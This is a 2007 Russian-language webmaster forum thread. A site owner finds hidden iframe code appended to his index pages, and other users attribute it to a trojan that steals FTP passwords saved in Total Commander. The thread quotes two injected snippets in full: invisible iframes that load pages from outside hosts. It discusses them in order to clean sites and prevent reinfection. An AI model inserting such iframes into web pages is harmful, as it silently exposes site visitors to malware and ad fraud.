Старый 07.07.2007, 13:07   #1
Новичок
 
Регистрация: 07.07.2007
Сообщений: 9
Вес репутации: 0
mysql на пути к лучшему
По умолчанию Справка по антивирусному обеспечению

Доброго времени!

Имею ряд сайтов, подключенных к всеми уважаемой системе SAPE.
Но 2 дня назад обнаружил интересную вещь: почти на всех этих сайтах в конец файлов index.html, index.htm, index.php (где что есть) кем-то был добавлен следующий код после тэга </HTML>:
Код:
<iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe><iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe>
Соответственно, при заходе на страницы сайтов это код прокачивает партнерки гугла, бегуна и т.п...
Есть серьезное подозрение, что в скрипте sape.php есть уязвимость, позволяющая модифицировать файлы на сайтах, где он расположен.
Ни у кого больше нет таких проблем?
mysql вне форума   Ответить с цитированием
Старый 07.07.2007, 13:18   #2
Злой модератор
 
Аватар для Wink
 
Регистрация: 25.03.2007
Адрес: Deep forest
Сообщений: 5,346
Вес репутации: 445
Wink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущее
По умолчанию

Вы подцепили трояна, который увел ваши пароли FTP. Сейчас такое часто бывает. Меняйте пароли, проверяйте комп, очищайте код сайта.
Sape здесь непричем
Wink вне форума   Ответить с цитированием
Старый 07.07.2007, 13:25   #3
Banned
 
Регистрация: 24.05.2007
Сообщений: 39
Вес репутации: 0
ABSolut нам пока неизвестен
По умолчанию

+1 Давненько этот троян бродит.
ABSolut вне форума   Ответить с цитированием
Старый 07.07.2007, 13:32   #4
Новичок
 
Регистрация: 07.07.2007
Сообщений: 9
Вес репутации: 0
mysql на пути к лучшему
По умолчанию

Спасибо за ответы. Никто не подскажет, что это за троян? Хостинг сайтов на линуксе и не совсем понятно как его почистить. И почему тогда взломали только сайты, подключенные к sape, хотя есть и ряд других?
mysql вне форума   Ответить с цитированием
Старый 07.07.2007, 13:48   #5
Злой модератор
 
Аватар для Wink
 
Регистрация: 25.03.2007
Адрес: Deep forest
Сообщений: 5,346
Вес репутации: 445
Wink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущееWink - прекрасное будущее
По умолчанию

А причем тут хостинг сайтов? Вы сами то под линуксом сидите или как? А в Total Commander или каком другом менеджере пароли к некоторым сайтам не забиты были? Разновидностей такого трояна много, все по разному себя проявляют.
Wink вне форума   Ответить с цитированием
Старый 07.07.2007, 13:52   #6
Новичок
 
Регистрация: 07.07.2007
Сообщений: 9
Вес репутации: 0
mysql на пути к лучшему
По умолчанию

Я сижу под виндой. Есть антивирус, фаервол, проверялка троянов - все со свежими базами и ни одна программа ничего не показывает. Вот поэтому и озадачился. В Total Commander пароли забиты - это факт.
mysql вне форума   Ответить с цитированием
Старый 07.07.2007, 14:04   #7
Специалист
 
Аватар для coguar
 
Регистрация: 28.06.2007
Адрес: Odessa
Сообщений: 104
Вес репутации: 150
coguar скоро станет известенcoguar скоро станет известен
По умолчанию

2автор: у меня после </html> стоит только <!-- Use compress gzip -->

)))
Ищи проблему у себя.

Здравая а может и больная логика подсказывает мне, что если бы было так как сказали ВЫ, то тот кто нашел бы способ изменять файлы через сапу - смог бы найти способ изменить это на ВСЕХ сайтах, а не только у Вас.
coguar вне форума   Ответить с цитированием
Старый 07.07.2007, 15:03   #8
Banned
 
Регистрация: 24.05.2007
Сообщений: 39
Вес репутации: 0
ABSolut нам пока неизвестен
По умолчанию

Цитата:
Сообщение от mysql Посмотреть сообщение
Я сижу под виндой. Есть антивирус, фаервол, проверялка троянов - все со свежими базами и ни одна программа ничего не показывает. Вот поэтому и озадачился. В Total Commander пароли забиты - это факт.
Через ТС и пролезает.
Могу привести цитату с моего хостинга:
Цитата:
Уважаемые клиенты! В связи с активизацией вирусов, похищающих пароли от ftp-аккаунтов, просим вас внимательнее относится к хранению ваших паролей. По возможности, не сохраняйте пароли в ftp-клиентах, вирусы пытаются достать информацию из конфигурации ftp-клиентов. Пользуйтесь антивирусами и firewall'ами.

Так же, старайтесь использовать длиные, "сложные" пароли, состоящие из цифр, строчных и заглавных букв. Хорошая практика - регулярная смена паролей.
Вобщем, меняйте все пароли, перезаливайте index на сайты
ABSolut вне форума   Ответить с цитированием
Старый 07.07.2007, 16:04   #9
Ваnnеd
 
Аватар для V!rus
 
Регистрация: 07.07.2007
Адрес: нет? :) Танцысбубном: да
Сообщений: 1,967
Вес репутации: 221
V!rus - прекрасное будущееV!rus - прекрасное будущееV!rus - прекрасное будущееV!rus - прекрасное будущееV!rus - прекрасное будущееV!rus - прекрасное будущееV!rus - прекрасное будущееV!rus - прекрасное будущееV!rus - прекрасное будущееV!rus - прекрасное будущееV!rus - прекрасное будущее
Отправить сообщение для V!rus с помощью ICQ
По умолчанию

блин, из ТС нада парольки убрать, хотя каспер все время работает.. мало ли что.
ЗЫЖ 2автор, повезло, не так уж и страшно. Троян вообще мог убить все файлы
__________________
Помогаю рефералам.
Осуществляю поддержку сайтов с OpenCart, Bitrix, Wordpress, DLE, Drupal, WebAsyst и пр. Скайп agriboed
V!rus вне форума   Ответить с цитированием
Старый 07.07.2007, 17:16   #10
Новичок
 
Регистрация: 30.05.2007
Адрес: UA
Сообщений: 32
Вес репутации: 148
DeKKO на пути к лучшему
По умолчанию

Мне тоже какой-то "доброжелатель" вкатил сегодня
Код HTML:
<iframe src="http://adventureboats.co.nz/skunk/images/index.htm" scrolling="no" frameborder="0" width=0 height=0></iframe>
Смотрите так:
если присадка тупо дописана во все индексы, то меняйте пароль FTP;
если как-то "по-уму" - дыра в движке.

И, я так понял, что такие изделия проиндексируются, как дополнительные внешние сылки.
__________________
Если О-ры имеют функционал для ухода в спячку, ВМ-ам обязаны предоставить возможность автоотстрела Sleep'ов!
DeKKO вне форума   Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 02:19.